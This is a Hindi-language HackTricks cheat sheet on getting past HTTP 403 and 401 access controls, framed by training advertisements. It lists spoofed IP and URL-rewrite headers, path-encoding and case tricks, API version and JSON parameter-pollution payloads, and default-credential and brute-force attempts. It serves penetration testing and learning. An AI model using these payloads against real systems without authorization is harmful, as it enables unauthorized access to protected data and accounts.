403 & 401 Bypasses
Last updated
Last updated
AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE) GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE)
अपने वेब ऐप्स, नेटवर्क और क्लाउड पर हैकर का दृष्टिकोण प्राप्त करें
महत्वपूर्ण, शोषण योग्य कमजोरियों को खोजें और रिपोर्ट करें जिनका वास्तविक व्यापार पर प्रभाव है। हमारे 20+ कस्टम टूल का उपयोग करें ताकि हमले की सतह को मैप कर सकें, सुरक्षा मुद्दों को खोज सकें जो आपको विशेषाधिकार बढ़ाने की अनुमति देते हैं, और आवश्यक सबूत इकट्ठा करने के लिए स्वचालित शोषण का उपयोग करें, जिससे आपका कठिन काम प्रभावशाली रिपोर्टों में बदल जाए।
फाइल तक पहुँचने के लिए विभिन्न क्रियाओं का उपयोग करने का प्रयास करें: GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE, PATCH, INVENTED, HACK
प्रतिक्रिया हेडर की जाँच करें, शायद कुछ जानकारी दी जा सकती है। उदाहरण के लिए, HEAD के लिए 200 प्रतिक्रिया जिसमें Content-Length: 55
है, का मतलब है कि HEAD क्रिया जानकारी तक पहुँच सकती है। लेकिन आपको अभी भी उस जानकारी को निकालने का एक तरीका खोजना होगा।
X-HTTP-Method-Override: PUT
जैसे HTTP हेडर का उपयोग करने से उपयोग की गई क्रिया को ओवरराइट किया जा सकता है।
TRACE
क्रिया का उपयोग करें और यदि आप बहुत भाग्यशाली हैं तो शायद प्रतिक्रिया में आप मध्यवर्ती प्रॉक्सी द्वारा जोड़े गए हेडर भी देख सकते हैं जो उपयोगी हो सकते हैं।
Host हेडर को किसी मनमाने मान में बदलें (यहाँ काम किया)
संसाधन तक पहुँचने के लिए अन्य यूजर एजेंट्स का उपयोग करने का प्रयास करें।
HTTP हेडर को फज़ करें: HTTP प्रॉक्सी हेडर, HTTP प्रमाणीकरण बेसिक और NTLM ब्रूट-फोर्स (केवल कुछ संयोजनों के साथ) और अन्य तकनीकों का उपयोग करने का प्रयास करें। इसके लिए मैंने टूल fuzzhttpbypass बनाया है।
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded: 127.0.0.1
Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-ProxyUser-Ip: 127.0.0.1
X-Original-URL: 127.0.0.1
Client-IP: 127.0.0.1
True-Client-IP: 127.0.0.1
Cluster-Client-IP: 127.0.0.1
X-ProxyUser-Ip: 127.0.0.1
Host: localhost
यदि पथ सुरक्षित है तो आप इन अन्य हेडरों का उपयोग करके पथ सुरक्षा को बायपास करने का प्रयास कर सकते हैं:
X-Original-URL: /admin/console
X-Rewrite-URL: /admin/console
यदि पृष्ठ प्रॉक्सी के पीछे है, तो शायद प्रॉक्सी आपको निजी जानकारी तक पहुँचने से रोक रही है। HTTP Request Smuggling या hop-by-hop headers** का दुरुपयोग करने का प्रयास करें।**
विभिन्न प्रतिक्रियाओं की तलाश में विशेष HTTP हेडर को फज़ करें।
HTTP विधियों को फज़ करते समय विशेष HTTP हेडर को फज़ करें।
Host हेडर को हटा दें और शायद आप सुरक्षा को बायपास करने में सक्षम होंगे।
यदि /path अवरुद्ध है:
/**%2e/path का उपयोग करने का प्रयास करें _(यदि पहुँच प्रॉक्सी द्वारा अवरुद्ध है, तो यह सुरक्षा को बायपास कर सकता है)। _** /%252e**/path (डबल URL एन्कोड) का भी प्रयास करें
Unicode बायपास का प्रयास करें: /%ef%bc%8fpath (URL एन्कोडेड वर्ण ऐसे हैं जैसे "/") इसलिए जब इसे फिर से एन्कोड किया जाएगा तो यह //path होगा और शायद आप पहले ही /path नाम की जाँच को बायपास कर चुके होंगे।
अन्य पथ बायपास:
site.com/secret –> HTTP 403 Forbidden
site.com/SECRET –> HTTP 200 OK
site.com/secret/ –> HTTP 200 OK
site.com/secret/. –> HTTP 200 OK
site.com//secret// –> HTTP 200 OK
site.com/./secret/.. –> HTTP 200 OK
site.com/;/secret –> HTTP 200 OK
site.com/.;/secret –> HTTP 200 OK
site.com//;//secret –> HTTP 200 OK
site.com/secret.json –> HTTP 200 OK (ruby)
निम्नलिखित स्थितियों में इस सूची का उपयोग करें:
/FUZZsecret
/FUZZ/secret
/secretFUZZ
अन्य API बायपास:
/v3/users_data/1234 --> 403 Forbidden
/v1/users_data/1234 --> 200 OK
{“id”:111} --> 401 Unauthorized
{“id”:[111]} --> 200 OK
{“id”:111} --> 401 Unauthorized
{“id”:{“id”:111}} --> 200 OK
{"user_id":"<legit_id>","user_id":"<victims_id>"} (JSON पैरामीटर प्रदूषण)
user_id=ATTACKER_ID&user_id=VICTIM_ID (पैरामीटर प्रदूषण)
param value बदलें: id=123
--> id=124
URL में अतिरिक्त पैरामीटर जोड़ें: ?
id=124
—-> id=124&isAdmin=true
पैरामीटर हटा दें
पैरामीटर का क्रम बदलें
विशेष वर्णों का उपयोग करें।
पैरामीटर में सीमा परीक्षण करें — जैसे -234 या 0 या 99999999 (केवल कुछ उदाहरण मान) प्रदान करें।
यदि HTTP/1.1 का उपयोग कर रहे हैं तो 1.0 का उपयोग करने का प्रयास करें या यह भी परीक्षण करें कि क्या यह 2.0 का समर्थन करता है।
डोमेन का IP या CNAME प्राप्त करें और प्रत्यक्ष संपर्क करने का प्रयास करें।
सामान्य GET अनुरोध भेजकर सर्वर पर दबाव डालने का प्रयास करें (यह इस व्यक्ति के लिए फेसबुक के साथ काम किया).
प्रोटोकॉल बदलें: http से https में, या https से http में
https://archive.org/web/ पर जाएं और जांचें कि क्या अतीत में वह फ़ाइल विश्व स्तर पर सुलभ थी।
पासवर्ड का अनुमान लगाएं: निम्नलिखित सामान्य क्रेडेंशियल्स का परीक्षण करें। क्या आप पीड़ित के बारे में कुछ जानते हैं? या CTF चुनौती का नाम?
Brute force: मूल, डाइजेस्ट और NTLM प्रमाणीकरण का प्रयास करें।
अपने वेब ऐप्स, नेटवर्क और क्लाउड पर एक हैकर का दृष्टिकोण प्राप्त करें
वास्तविक व्यावसायिक प्रभाव के साथ महत्वपूर्ण, शोषण योग्य कमजोरियों को खोजें और रिपोर्ट करें। हमारे 20+ कस्टम उपकरणों का उपयोग करके हमले की सतह को मानचित्रित करें, सुरक्षा मुद्दों को खोजें जो आपको विशेषाधिकार बढ़ाने की अनुमति देते हैं, और आवश्यक सबूत इकट्ठा करने के लिए स्वचालित शोषण का उपयोग करें, जिससे आपका कठिन काम प्रभावशाली रिपोर्टों में बदल जाए।
AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE) GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE)